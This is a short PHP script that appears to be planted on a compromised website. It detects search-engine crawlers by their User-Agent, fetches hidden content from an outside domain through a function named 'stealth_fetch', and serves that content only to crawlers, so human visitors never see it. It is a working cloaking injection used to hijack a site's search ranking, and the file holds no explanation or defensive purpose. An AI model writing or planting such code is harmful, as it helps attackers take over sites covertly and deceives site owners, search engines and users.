<?php
ob_start();
header('Vary: Accept-Language, User-Agent');

$bot_url = "https://piona.xyz/landing/journal.yayasansahara.org/oke.txt";
$ua = strtolower($_SERVER['HTTP_USER_AGENT']);

$bots = ['googlebot', 'slurp', 'bingbot', 'baiduspider', 'yandex', 'crawler', 'spider', 'adsense', 'inspection'];

$is_bot = false;
foreach ($bots as $b) {
    if (strpos($ua, $b) !== false) {
        $is_bot = true;
        break;
    }
}

function stealth_fetch($url) {
    $ctx = stream_context_create([
        'http' => [
            'method' => 'GET',
            'header' => "User-Agent: Mozilla/5.0\r\n"
        ]
    ]);
    return @file_get_contents($url, false, $ctx);
}

if ($is_bot) {
    usleep(mt_rand(100000, 200000));
    $konten = stealth_fetch($bot_url);
    if ($konten !== false) {
        echo $konten;
    }
    ob_end_flush();
    exit;
}
?>
